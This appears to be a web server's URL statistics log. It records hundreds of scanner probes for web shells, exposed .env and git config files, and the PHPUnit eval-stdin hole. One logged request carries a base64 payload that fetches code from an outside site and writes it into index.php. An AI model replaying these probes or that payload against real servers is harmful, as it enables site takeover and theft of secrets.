0 0 29415130 0 0 29415130 0 /z60.php?p= 1 0 0 0 1 0 0 29372859 0 0 29372859 0 /l10n.php 1 0 0 0 2 0 0 29327096 0 0 29294468 0 /shell20250630.php 1 0 0 0 4 0 0 29325243 0 0 28620679 0 /admin/.env 1 0 0 0 3 0 0 29372859 0 0 29367838 0 /fso.php 1 0 0 0 5 0 0 29415130 0 0 29367838 0 /wp-admin/js/index.php 1 0 0 0 2 0 0 29388817 0 0 29248560 0 /.env.backup 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /file22.php 1 0 0 0 1 0 0 29415130 0 0 29415130 0 /ave.php 1 0 0 0 9 0 0 29415130 0 0 29299891 0 /wp-freya.php 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /log.php 1 0 0 0 2 0 0 29278576 0 0 29211744 0 /wp-content/about.php 1 0 0 0 13 0 0 29402814 0 0 29291986 0 /atomlib.php 1 13 13 0 0 29389153 0 0 28598316 0 0 7325 /?rest_route=/wp/v2/users/ 1 0 0 0 3 0 0 29362131 0 0 29354065 0 /ea.php 1 0 0 0 4 0 0 29145055 0 0 28867962 0 /feed/ 1 0 0 0 2 0 0 29388817 0 0 29248560 0 /test/phpinfo.php 1 0 0 0 3 0 0 29384959 0 0 29327095 0 /shoha.php 1 0 0 0 6 0 0 29388027 0 0 29367838 0 /afile.php 1 0 0 0 5 0 0 29415130 0 0 29299891 0 /class19.php 1 0 0 0 10 0 0 29415130 0 0 29282380 0 /class20.php 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29299891 0 0 29299891 0 /vast.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /upload.php 1 0 0 0 1 0 0 29278576 0 0 29278576 0 /remote.php 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /plugins/Cache/footer.php 1 0 0 0 1 0 0 29291986 0 0 29291986 0 /wp-includes/certificates/plugins.php 1 0 0 0 1 0 0 29291986 0 0 29291986 0 /cbgd.php 1 0 0 0 1 0 0 29210011 0 0 29210011 0 /wp-admin/js/widgets/users.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /html/.env 1 0 0 0 5 0 0 29359668 0 0 29325293 0 /v4.php 1 0 0 0 1 0 0 28940400 0 0 28940400 0 /vendor/laravel-filemanager/js/script.js 1 0 0 0 1 0 0 29313818 0 0 29313818 0 /Wp 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /terraform.tfvars 1 0 0 0 3 0 0 29416373 0 0 29187273 0 /backend/.env 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /lib/.env 1 0 0 0 6 0 0 29388027 0 0 29367838 0 /X7x.php 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /lib.php 1 0 0 0 6 0 0 29415130 0 0 29325293 0 /admin/function.php 1 0 0 0 6 0 0 29388027 0 0 29367838 0 /wa.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /.env.project 1 0 0 0 1 0 0 29129499 0 0 29129499 0 /logs/.git/config 1 0 0 0 2 0 0 29327095 0 0 29294468 0 /algox.php 1 0 0 0 1 0 0 29210039 0 0 29210039 0 /.well-known/pki-validation/iR7SzrsOUEP.php 1 0 0 0 7 0 0 29388632 0 0 29278576 0 /bypass.php 1 0 0 0 6 0 0 29415130 0 0 29277539 0 /wp-trackback.php 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /wp-admin/network/wp-conflg.php?p= 1 0 0 0 1 0 0 28777719 0 0 28777719 0 /php_info 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /.remote 1 0 0 0 3 0 0 29388631 0 0 29278577 0 /z.php 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /wp-content/plugins/admin.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /test/.env 1 0 0 0 6 0 0 29362131 0 0 29299891 0 /0x0x.php 1 0 0 0 1 0 0 28640178 0 0 28640178 0 /robots.txt?195.211.77.140 1 0 0 0 5 0 0 29415130 0 0 29032976 0 /php.php 1 0 0 0 1 0 0 29129499 0 0 29129499 0 /src/.git/config 1 0 0 0 1 0 0 29278576 0 0 29278576 0 /phpshell.php 1 0 0 0 6 0 0 29388027 0 0 29354064 0 /opts.php 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /an7.php 1 1 0 0 0 28701918 0 0 28701918 0 0 2321 /_autoindex/assets/js/tablesort.js?199.45.154.72 1 0 0 0 1 0 0 29313822 0 0 29313822 0 /WP 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /aws.json 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /subversive_shell.php 1 0 0 0 4 0 0 29145055 0 0 28867962 0 /wp-includes/ID3/license.txt 1 0 0 0 3 0 0 29362131 0 0 29354065 0 /r79.php 1 0 0 0 4 0 0 29364458 0 0 29354735 0 /manager/assets/modext/core/modx.js 1 0 0 0 4 0 0 29364468 0 0 29354729 0 /manager/media/script/mootools/mootools.js 1 0 0 0 1 0 0 29278576 0 0 29278576 0 /priv8.php 1 0 0 0 2 0 0 28976763 0 0 28916044 0 /ads.txt?104.166.80.124 1 0 0 0 1 0 0 29294468 0 0 29294468 0 /mnkalo.php 1 0 0 0 11 0 0 29388027 0 0 29299891 0 /usep.php 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /u.php 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /local_settings.py 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /env 1 0 0 0 6 0 0 29372859 0 0 29299891 0 /lala.php 1 0 0 0 2 0 0 29361379 0 0 29361369 0 /profile.php 1 0 0 0 1 0 0 28775634 0 0 28775634 0 /backup.zip 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /AnonFox.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /.env.php 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /qing.php 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /wp-content/themes/aahana/json.php 1 0 0 0 2 0 0 29250912 0 0 29250911 0 /.htaccess 1 0 0 0 9 0 0 29410639 0 0 28995766 0 /blog 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /staging/.env 1 0 0 0 3 0 0 29372859 0 0 29367838 0 /haikh.php 1 0 0 0 3 0 0 29368602 0 0 29299891 0 /cccc.php 1 37 0 0 0 29301500 0 0 28598316 0 0 14365 /_autoindex/assets/icons/folder-fill.svg 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /csv.php 1 0 0 0 1 0 0 29187255 0 0 29187255 0 /deployment-config.json 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /twso.php 1 0 0 0 2 0 0 29274239 0 0 29270173 0 /blog/robots.txt 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /components/components.php 1 0 0 0 1 0 0 28990819 0 0 28990819 0 /.vscode/sftp.json?45.148.10.172 1 2 2 0 0 29250913 0 0 29250912 0 0 1194 /.well-known/acme-challenge/?SD 1 0 0 0 9 0 0 29388027 0 0 29354064 0 /wfile.php 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /abc.php 1 2 2 0 0 29250913 0 0 29250912 0 0 1196 /.well-known/acme-challenge/?SA 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /zr.php 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /reverse_shell.php 1 0 0 0 3 0 0 29359668 0 0 29325294 0 /.well-known/acme-challenge/admin.php 1 0 0 0 6 0 0 29384959 0 0 29278577 0 /p.php 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /nxx.php 1 0 0 0 3 0 0 29415130 0 0 29211743 0 /themes.php 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /wp-content/uploads/yourfile.php 1 0 0 0 1 0 0 29372859 0 0 29372859 0 /lte7.php 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /wp-includes/template-loader.php 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /wp-admin/includes/media.php 1 0 0 0 1 0 0 29358155 0 0 29358155 0 /rest?147.93.158.41 1 0 0 0 7 0 0 29362131 0 0 29325293 0 /11.php 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 9 0 0 29388027 0 0 29354065 0 /alpa.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /.env.save 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /cmd_access.php 1 0 0 0 5 0 0 29388632 0 0 29294468 0 /racs3.php 1 0 0 0 2 0 0 29388817 0 0 29248560 0 /appsettings.json 1 0 0 0 8 0 0 29372859 0 0 29299891 0 /ilex.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /portal/.env 1 0 0 0 1 0 0 29107921 0 0 29107921 0 /.vscode/sftp.json?192.42.116.194 1 0 0 0 2 0 0 29250913 0 0 29250911 0 /akcc.php?p=&view=.htaccess 1 0 0 0 1 0 0 29211743 0 0 29211743 0 /ynz.PhP7 1 0 0 0 4 0 0 29372859 0 0 29294468 0 /xpass.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /fifi.php 1 0 0 0 2 0 0 29388631 0 0 29386475 0 /filemanager.php 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 11 0 0 29388632 0 0 29291986 0 /CLA.php 1 0 0 0 1 0 0 29372859 0 0 29372859 0 /x0x.php 1 0 0 0 1 0 0 29389153 0 0 29389153 0 /swagger/v1/swagger.json 1 0 0 0 1 0 0 29210010 0 0 29210010 0 /wp-content/themes/intense/block-css.php?mode=upload 1 0 0 0 1 0 0 29291986 0 0 29291986 0 /aucxzso.php 1 0 0 0 2 0 0 29327096 0 0 29294468 0 /sxb.php 1 0 0 0 5 0 0 29368850 0 0 29326315 0 /tiny.php 1 2 2 0 0 29250913 0 0 29250912 0 0 1192 /.well-known/acme-challenge/?ND 1 0 0 0 2 0 0 29341248 0 0 29278577 0 /k.php 1 0 0 0 2 0 0 29248560 0 0 28775634 0 /wp-config.php 1 0 0 0 4 0 0 29325243 0 0 28620679 0 /core/.env 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /css/xp.php 1 2 2 0 0 29250913 0 0 29250912 0 0 1194 /.well-known/acme-challenge/?NA 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /smpx.php 1 0 0 0 2 0 0 28987232 0 0 28968112 0 /wp-login.php?45.148.10.172 1 0 0 0 11 0 0 29415130 0 0 29291986 0 /520.php 1 0 0 0 2 0 0 29250913 0 0 29250912 0 /akcc.php?p=&quickView=1&view=.htaccess 1 0 0 0 1 0 0 29291986 0 0 29291986 0 /C1.php 1 0 0 0 2 0 0 28860141 0 0 28808242 0 /robots.txt?104.166.80.124 1 2 2 0 0 29250913 0 0 29250912 0 0 1196 /.well-known/acme-challenge/?MD 1 0 0 0 5 0 0 29415130 0 0 29282380 0 /new.php 1 0 0 0 1 0 0 29303342 0 0 29303342 0 /wp-login.php?147.93.158.41 1 0 0 0 29 0 0 29389153 0 0 28598316 0 /config.json 1 2 2 0 0 29250913 0 0 29250912 0 0 1198 /.well-known/acme-challenge/?MA 1 0 0 1 1 0 29250911 29250912 0 29250911 29250912 0 /akcc.php?del=akcc.php&p= 1 0 0 0 32 0 0 29416373 0 0 28777719 0 /info.php 1 0 0 0 1 0 0 29313945 0 0 29313945 0 /sito 1 0 0 0 1 0 0 29313835 0 0 29313835 0 /OLD 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /admin/index.php 1 0 0 0 1 0 0 28726835 0 0 28726835 0 /favicon.ico?198.235.24.138 1 0 0 0 2 0 0 29359668 0 0 29325293 0 /wp-includes/Text/Diff/Engine/about.php 1 0 0 0 15 0 0 29415130 0 0 29325293 0 /f35.php 1 0 0 0 2 0 0 29326315 0 0 29299891 0 /file6.php 1 0 0 0 2 0 0 29327095 0 0 29294468 0 /yep.php 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /en/.env 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /sid3.php 1 0 0 0 5 0 0 29359668 0 0 29325293 0 /0.php 1 0 0 0 2 0 0 29410639 0 0 29313948 0 /site 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /wek.php 1 0 0 0 8 0 0 29388027 0 0 29299891 0 /444.php 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /dd1.php 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /f.php 1 0 0 0 1 0 0 29299891 0 0 29299891 0 /NH19T66T.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /.env.dist 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /backend 1 0 0 0 1 0 0 29291986 0 0 29291986 0 /tesla.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /logs/app.log 1 0 0 0 5 0 0 29415130 0 0 29372859 0 /class9.php 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /secure_shell.php 1 0 0 0 3 0 0 29326315 0 0 29248560 0 /config.php 1 0 0 0 1 0 0 29402814 0 0 29402814 0 /ww5.php 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /zhidagen.php 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /nc.php 1 0 0 0 13 0 0 29389153 0 0 28598316 0 /server 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /deploy.sh 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /wp-rss4.php 1 0 0 0 1 0 0 29278576 0 0 29278576 0 /r57.php 1 0 0 0 1 0 0 29210010 0 0 29210010 0 /wp-content/themes/hideo/network.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /config/database.json 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /.well-known/xin1.php?p 1 0 0 0 2 0 0 29329147 0 0 29326315 0 /a1.php 1 0 0 0 12 0 0 29388027 0 0 29299891 0 /file1.php 1 4 0 0 0 29389153 0 0 29389153 0 0 424 /.well-known/acme-challenge/hQrWaogLnXSmY4CR7fpExoKS2u5Awlc3f9cR_ulMrzw 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /ru.php 1 0 0 0 1 0 0 29372859 0 0 29372859 0 /Zeiss.php 1 0 0 0 1 0 0 29299891 0 0 29299891 0 /blex.php 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /view.php 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /admin/controller/extension/shipping.php 1 0 0 0 7 0 0 29416373 0 0 28777719 0 /phpinfo 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /zc.php 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /admin/controller/setting/store.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /bu5.php 1 0 0 0 1 0 0 29415130 0 0 29415130 0 /file48.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /alam.php 1 0 0 0 1 0 0 29291986 0 0 29291986 0 /wsback.php 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /repair.php 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /exhitrgp.php 1 0 0 0 9 0 0 29372859 0 0 29278577 0 /a.php 1 0 0 0 1 0 0 29211743 0 0 29211743 0 /ws.php.php 1 0 0 0 1 0 0 29291986 0 0 29291986 0 /krypton.php 1 0 0 0 7 0 0 29415130 0 0 29294468 0 /gg.php 1 0 0 0 1 0 0 29415130 0 0 29415130 0 /gtc.php 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /admin/controller/common/header.php 1 0 0 0 1 0 0 29079415 0 0 29079415 0 /wordpress?192.42.116.194 1 0 0 0 1 0 0 29210038 0 0 29210038 0 /wp-content/upgrade/iR7SzrsOUEP.php 1 0 0 0 2 0 0 29327095 0 0 29294468 0 /wp-cliner.php 1 0 0 0 2 0 0 29359668 0 0 29325294 0 /chosen.php? 1 0 0 0 9 0 0 29388027 0 0 29354064 0 /wpo.php 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /search.php 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /privileged_shell.php 1 0 0 0 2 0 0 29278576 0 0 29211744 0 /wp-admin/images/admin.php 1 0 0 0 3 0 0 29416373 0 0 29248560 0 /settings.py 1 0 0 0 1 0 0 29410639 0 0 29410639 0 /dev 1 1 0 0 1 29250911 0 29250912 29250911 0 29250912 8991 /akcc.php?p 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /node.php 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /dashboard/phpinfo.php 1 0 0 0 1 0 0 29291986 0 0 29291986 0 /inc.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /.gitlab-ci/.env 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /phpunit/phpunit/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /config/secrets.yml 1 0 0 0 22 0 0 29393907 0 0 28867962 0 /cms/wp-includes/wlwmanifest.xml 1 0 0 0 1 0 0 29410639 0 0 29410639 0 /cms 1 2 2 0 0 29250912 0 0 29250911 0 0 1336 /.well-known/ 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /admin/info.php 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /u6dex.php 1 0 0 0 4 0 0 29388027 0 0 29282380 0 /modules/mod_simplefileuploadv1.3/elements/filemanager.php 1 0 0 0 3 0 0 29362131 0 0 29354064 0 /ab.php 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /filemanager/dialog.php 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /logs/access.log 1 0 0 0 1 0 0 29341248 0 0 29341248 0 /just2.php 1 0 0 0 2 0 0 29341248 0 0 29341248 0 /xp.php 1 0 0 0 1 0 0 29402814 0 0 29402814 0 /cafe.php 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /admin/controller/setting/setting.php 1 0 0 0 1 0 0 29210039 0 0 29210039 0 /cgi-bin/iR7SzrsOUEP.php 1 0 0 0 4 0 0 29326315 0 0 29291986 0 /class.1.php 1 0 0 0 2 0 0 29278578 0 0 29278578 0 /admin/controller/extension/extension.php 1 0 0 0 2 0 0 29327095 0 0 29294468 0 /nope.php 1 0 0 0 1 0 0 29341248 0 0 29341248 0 /litanies.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /.env.sample 1 0 0 0 2 0 0 29282380 0 0 29277539 0 /wp-content/plugins/hellopress/wp_filemanager.php?192.42.116.194 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /frontend/.env 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /xxx.php 1 0 0 0 3 0 0 29372859 0 0 29367838 0 /bless6.php 1 1 0 0 0 28949643 0 0 28949643 0 0 64 /.well-known/acme-challenge/7LPAH43X97995Z3TZE8R4FNABY7U1XJU 1 0 0 0 2 0 0 29299891 0 0 29291986 0 /hexx.php 1 0 0 0 4 0 0 29384960 0 0 29294468 0 /vxrl.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /src/config/environment.json 1 0 0 0 2 0 0 29093617 0 0 29032976 0 /config.phpinfo 1 0 0 0 1 0 0 29416373 0 0 29416373 0 /laravel.log 1 0 0 0 1 0 0 29415130 0 0 29415130 0 /aQw.php 1 0 0 0 1 0 0 29291986 0 0 29291986 0 /pkm.php 1 0 0 0 2 0 0 29329147 0 0 29326315 0 /mb.php 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /wp-content/cong.php 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /vxonb.php 1 0 0 0 1 0 0 29389153 0 0 29389153 0 /v2/api-docs 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /rdfe.php 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /staging/phpinfo.php 1 0 0 0 3 0 0 29388632 0 0 29326315 0 /get.php 1 0 0 0 1 0 0 29402814 0 0 29402814 0 /js/fm.php 1 0 0 0 1 0 0 29389153 0 0 29389153 0 /api/gql 1 2 0 0 0 29250911 0 0 29250911 0 0 16598 /akcc.php?p=cgi-bin 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /exapi/.env 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /wpc1.php 1 0 0 0 3 0 0 29388632 0 0 29365498 0 /zc-749.php 1 0 0 0 4 0 0 29388632 0 0 29365498 0 /asd67.php 1 0 0 0 2 0 0 29359668 0 0 29325294 0 /wp-cron.php? 1 0 0 0 1 0 0 29313847 0 0 29313847 0 /NEW 1 0 0 0 1 0 0 29313934 0 0 29313934 0 /shop 1 0 0 0 1 0 0 29389153 0 0 29389153 0 /swagger.json 1 0 0 0 1 0 0 29187244 0 0 29187244 0 /upload/ALFA_DATA/alfacgiapi/ 1 0 0 0 1 0 0 29389153 0 0 29389153 0 /api-docs/swagger.json 1 0 0 0 2 0 0 29327096 0 0 29294468 0 /elf.php 1 0 0 0 17 0 0 29415130 0 0 29299891 0 /222.php 1 0 0 0 1 0 0 29294468 0 0 29294468 0 /ff.php 1 0 0 0 1 0 0 29291986 0 0 29291986 0 /rjv.php 1 1 0 0 0 29213343 0 0 29213343 0 0 64 /.well-known/acme-challenge/K3FTYZZLZW9VA3PF0_67LW0RQG656HPW 1 0 0 0 2 0 0 29359668 0 0 29325294 0 /wp-content/themes/wp-pridmag/init.php 1 0 0 0 1 0 0 29250913 0 0 29250913 0 /akcc.php?copy=.well-known&finish=1&p= 1 0 0 0 1 0 0 29299891 0 0 29299891 0 /fass.php 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /images/m.php 1 0 0 0 2 0 0 29327095 0 0 29294468 0 /bypltspd.php 1 0 0 0 1 0 0 29306748 0 0 29306748 0 /jx.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /sid.php 1 0 0 0 3 0 0 29299891 0 0 29291986 0 /gfile1.php 1 0 0 0 3 0 0 29359668 0 0 29325293 0 /4.php?p= 1 0 0 0 2 0 0 29327095 0 0 29294468 0 /ma1.php 1 0 0 0 4 0 0 29415130 0 0 29211745 0 /wp-content/plugins/index.php 1 0 0 0 2 0 0 29359668 0 0 29325294 0 /about/function.php? 1 0 0 0 1 0 0 29210010 0 0 29210010 0 /wp-admin/css/colors/ectoplasm/users.php 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /Anon.php 1 0 0 0 24 0 0 29393906 0 0 28867962 0 /wordpress/wp-includes/wlwmanifest.xml 1 0 0 0 1 0 0 29306748 0 0 29306748 0 /acxx.php 1 0 0 0 1 0 0 29033651 0 0 29033651 0 /(*)/*+*+"+*+"*/ 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /.env.stage 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /wp-content/plugins/yourplugin/yourplugin.php 1 0 0 0 2 0 0 29362131 0 0 29358831 0 /x0.php 1 0 0 0 3 0 0 29416373 0 0 29248560 0 /wp-content/debug.log 1 0 0 0 1 0 0 28604394 0 0 28604394 0 /backup/.git/config 1 0 0 0 2 0 0 29388817 0 0 29248560 0 /docker-compose.yml 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /config/config.php 1 0 0 0 5 0 0 29384959 0 0 29291986 0 /jmfi2.php 1 0 0 0 5 0 0 29415130 0 0 29365498 0 /cong.php 1 0 0 0 2 0 0 28774705 0 0 28686848 0 /Public/home/js/check.js 1 0 0 0 2 0 0 29299891 0 0 29291986 0 /file32.php 1 1 0 0 0 28695169 0 0 28695169 0 0 7604 /cgi-sys/suspendedpage.cgi 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /update/f35.php 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /wp-admin/maint/about.php 1 0 0 0 2 0 0 29329147 0 0 29325293 0 /inputs.php?p= 1 0 0 0 4 0 0 29388632 0 0 29294468 0 /trd.php 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /zews.php 1 0 0 0 3 0 0 29372859 0 0 29367838 0 /size.php?p= 1 0 0 0 1 0 0 29187239 0 0 29187239 0 /wordpress/ALFA_DATA/alfacgiapi/ 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /js.php 1 0 0 0 1 0 0 29415130 0 0 29415130 0 /la.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /winkel.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /wsr2.php?p= 1 0 0 0 1 0 0 28604394 0 0 28604394 0 /new/.git/config 1 0 0 0 1 0 0 29211762 0 0 29211762 0 /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJ2luZGV4LnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHBzOi8vcmVudHJ5LmNvLzh1cW9uOGh6L3JhdycpKTs= 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /iko.php 1 0 0 0 1 0 0 29387122 0 0 29387122 0 /efsd.php 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /jf1d22.php 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /database/.env 1 0 0 0 5 0 0 29388632 0 0 29291986 0 /r4f_1.php 1 0 0 0 7 0 0 29415130 0 0 29228723 0 /inputs.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /oiepfuav.php 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /ubh.php 1 0 0 0 2 0 0 29384960 0 0 29365498 0 /okxoby.php 1 0 0 0 3 0 0 29362131 0 0 29354064 0 /aghbvr.php 1 0 0 0 13 0 0 29388631 0 0 29306748 0 /ee.php 1 0 0 0 1 0 0 29093617 0 0 29093617 0 /php.php?192.42.116.194 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /config/mail.php 1 0 0 0 9 0 0 29388027 0 0 29354065 0 /classgoto24.php 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /site/.env 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /wp-su.php 1 0 0 0 1 0 0 29372859 0 0 29372859 0 /adin.php 1 0 0 0 9 0 0 29388632 0 0 29291986 0 /cfile.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /.env-example 1 0 0 0 2 0 0 29329147 0 0 29326315 0 /pepe.php 1 0 0 0 4 0 0 29415130 0 0 29325294 0 /.well-known/acme-challenge/index.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /api/info 1 0 0 0 3 0 0 29359668 0 0 29325294 0 /wp-includes/IXR/admin.php 1 0 0 0 2 0 0 29278576 0 0 29211744 0 /wp-includes/install.php 1 0 0 0 2 0 0 29365498 0 0 29325293 0 /gdn.php 1 0 0 0 2 0 0 29126896 0 0 28952789 0 /wp-content/ 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /uploads/.env 1 0 0 0 1 0 0 29389153 0 0 29389153 0 /s/238313e29393e26343e28373/_/ 1 0 0 0 1 0 0 29389153 0 0 29389153 0 /swagger/swagger-ui.html 1 0 0 0 1 0 0 29341248 0 0 29341248 0 /pop.php 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /rd1.php 1 0 0 0 2 0 0 29389153 0 0 29248560 0 /api 1 0 0 0 2 0 0 29327095 0 0 29294468 0 /shorw.php 1 0 0 0 3 0 0 29372859 0 0 29367838 0 /135.php 1 0 0 0 5 0 0 29368602 0 0 29354065 0 /klex.php 1 0 0 0 14 0 0 29388632 0 0 29277539 0 /we.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /local/.env 1 0 0 0 11 0 0 29388027 0 0 29326315 0 /file21.php 1 0 0 0 1 0 0 29187225 0 0 29187225 0 /alfacgiapi/ 1 0 0 0 2 0 0 29327095 0 0 29294468 0 /H.php 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /fai.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /13k.php 1 0 0 0 1 0 0 28699631 0 0 28699631 0 /wp-login.php?199.45.154.72 1 0 0 0 18 0 0 29415130 0 0 29277539 0 /abcd.php 1 0 0 0 1 0 0 29306748 0 0 29306748 0 /good.php 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /000.php 1 0 0 0 1 0 0 29353653 0 0 29353653 0 /adminer.php 1 0 0 0 2 0 0 29388631 0 0 29386475 0 /.well-known/info.php 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /nax.php 1 0 0 0 3 0 0 29325243 0 0 29248560 0 /web/.env 1 0 0 0 10 0 0 29415130 0 0 29291986 0 /new4.php 1 0 0 0 3 0 0 29372859 0 0 29367838 0 /--.php 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /4yps5d.php 1 0 0 0 1 0 0 28739356 0 0 28739356 0 /robots.txt?198.235.24.138 1 0 0 0 4 0 0 29388632 0 0 29326315 0 /dev.php 1 0 0 0 1 0 0 29299891 0 0 29299891 0 /ipil.php 1 0 0 0 2 0 0 29327095 0 0 29294468 0 /wpls.php 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /underground_shell.php 1 0 0 0 1 0 0 29187214 0 0 29187214 0 /images/ALFA_DATA/alfacgiapi/ 1 0 0 0 2 0 0 28779945 0 0 28776600 0 /.env?104.166.80.124 1 0 0 0 4 0 0 29388632 0 0 29365498 0 /v3.php 1 0 0 0 4 0 0 29388817 0 0 29032976 0 /pi.php 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /icon.php 1 0 0 0 2 0 0 29278576 0 0 29211745 0 /wp-content/themes/twentytwentythree/patterns/index.php 1 0 0 0 5 0 0 29388632 0 0 29294468 0 /tcp.php 1 0 0 0 19 0 0 29393907 0 0 28968133 0 /website/wp-includes/wlwmanifest.xml 1 0 0 0 5 0 0 29362131 0 0 29299891 0 /nfile.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /.well-known/ws.php 1 0 0 0 2 0 0 